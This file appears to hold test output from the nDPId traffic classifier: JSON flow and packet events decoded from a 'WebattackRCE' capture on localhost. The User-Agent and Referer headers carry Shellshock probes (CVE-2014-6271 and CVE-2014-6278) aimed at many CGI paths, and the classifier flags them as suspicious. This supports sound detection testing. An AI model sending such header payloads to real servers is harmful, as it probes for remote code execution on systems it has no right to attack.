-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":489,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277458,"flow_last_seen":1576420277458,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277458,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50540,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":489,"flow_packet_id":1,"flow_last_seen":1576420277458,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277458,"pkt":"AAAAAAAAAAAAAAAACABFAAENOM9AAEAGAxp\/AAABfwAAAcVsH5CGwwAaI+XJXIAYAED\/AQAAAQEICp1m\/fqdZv36R0VUIC90ZXN0LmNnaS5waHAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":489,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277458,"flow_last_seen":1576420277458,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277458,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50540,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.cgi.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":490,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277459,"flow_last_seen":1576420277459,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277459,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50542,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":490,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":490,"flow_packet_id":1,"flow_last_seen":1576420277459,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277459,"pkt":"AAAAAAAAAAAAAAAACABFAAEMfPpAAEAGvu9\/AAABfwAAAcVuH5CbL0QudOlGT4AYAED\/AAAAAQEICp1m\/fudZv37R0VUIC90ZXN0X2NnaS5wbCBIVFRQLzEuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01167{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":490,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277459,"flow_last_seen":1576420277459,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277459,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50542,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test_cgi.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":491,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277460,"flow_last_seen":1576420277460,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277460,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50544,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":491,"flow_packet_id":1,"flow_last_seen":1576420277460,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277460,"pkt":"AAAAAAAAAAAAAAAACABFAAEMyD1AAEAGc6x\/AAABfwAAAcVwH5BPvfDvcLTsqIAYAED\/AAAAAQEICp1m\/fydZv38R0VUIC90ZXN0LWNnaS5wbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01167{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":491,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277460,"flow_last_seen":1576420277460,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277460,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50544,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test-cgi.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":492,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277462,"flow_last_seen":1576420277462,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277462,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50546,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":492,"flow_packet_id":1,"flow_last_seen":1576420277462,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277462,"pkt":"AAAAAAAAAAAAAAAACABFAAEIoLlAAEAGmzR\/AAABfwAAAcVyH5A1vJhjWIrHxIAYAED+\/AAAAQEICp1m\/f2dZv39R0VUIC90ZXN0LnB5IEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":492,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277462,"flow_last_seen":1576420277462,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277462,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50546,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.py","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":493,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277463,"flow_last_seen":1576420277463,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277463,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50548,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":493,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":493,"flow_packet_id":1,"flow_last_seen":1576420277463,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277463,"pkt":"AAAAAAAAAAAAAAAACABFAAEILLBAAEAGDz5\/AAABfwAAAcV0H5AN6xR8l7l+o4AYAED+\/AAAAQEICp1m\/f+dZv3+R0VUIC90ZXN0LnNoIEhUVFAvMS4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":493,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277463,"flow_last_seen":1576420277463,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277463,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50548,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.sh","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":494,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277464,"flow_last_seen":1576420277464,"flow_idle_time":7440000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277464,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50550,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":494,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":494,"flow_packet_id":1,"flow_last_seen":1576420277464,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":284,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":284,"pkt_l4_len":250,"thread_ts_msec":1576420277464,"pkt":"AAAAAAAAAAAAAAAACABFAAEOUvlAAEAG6O5\/AAABfwAAAcV2H5BXVWoitNrsWoAYAED\/AgAAAQEICp1m\/gCdZv4AR0VUIC90bVVuYmxvY2suY2dpIEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01169{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":494,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277464,"flow_last_seen":1576420277464,"flow_idle_time":7440000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277464,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50550,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/tmUnblock.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":495,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277465,"flow_last_seen":1576420277465,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277465,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50552,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":495,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":495,"flow_packet_id":1,"flow_last_seen":1576420277465,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277465,"pkt":"AAAAAAAAAAAAAAAACABFAAEKgUVAAEAGuqZ\/AAABfwAAAcV4H5AZ0bmWzQ36cYAYAED+\/gAAAQEICp1m\/gGdZv4BR0VUIC91bmFtZS5jZ2kgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":495,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277465,"flow_last_seen":1576420277465,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277465,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50552,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/uname.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":496,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277466,"flow_last_seen":1576420277466,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277466,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50554,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":496,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":496,"flow_packet_id":1,"flow_last_seen":1576420277466,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277466,"pkt":"AAAAAAAAAAAAAAAACABFAAEM2vpAAEAGYO9\/AAABfwAAAcV6H5AtBOIv4uMLlYAYAED\/AAAAAQEICp1m\/gKdZv4CR0VUIC92aWV3Y3ZzLmNnaSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCg0K"} -01167{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":496,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277466,"flow_last_seen":1576420277466,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277466,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50554,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewcvs.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":497,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277467,"flow_last_seen":1576420277467,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277467,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50556,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":497,"flow_packet_id":1,"flow_last_seen":1576420277467,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277467,"pkt":"AAAAAAAAAAAAAAAACABFAAEITytAAEAG7MJ\/AAABfwAAAcV8H5BFlnf\/97sS7IAYAED+\/AAAAQEICp1m\/gOdZv4DR0VUIC93ZWxjb21lIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":497,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277467,"flow_last_seen":1576420277467,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277467,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50556,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/welcome","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":498,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277469,"flow_last_seen":1576420277469,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277469,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50558,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":498,"flow_packet_id":1,"flow_last_seen":1576420277469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277469,"pkt":"AAAAAAAAAAAAAAAACABFAAEK4AFAAEAGW+p\/AAABfwAAAcV+H5B29+cpQb7It4AYAED+\/gAAAQEICp1m\/gWdZv4FR0VUIC93aG9pcy5jZ2kgSFRUUC8xLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQoNCg=="} -01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":498,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277469,"flow_last_seen":1576420277469,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277469,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50558,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/whois.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 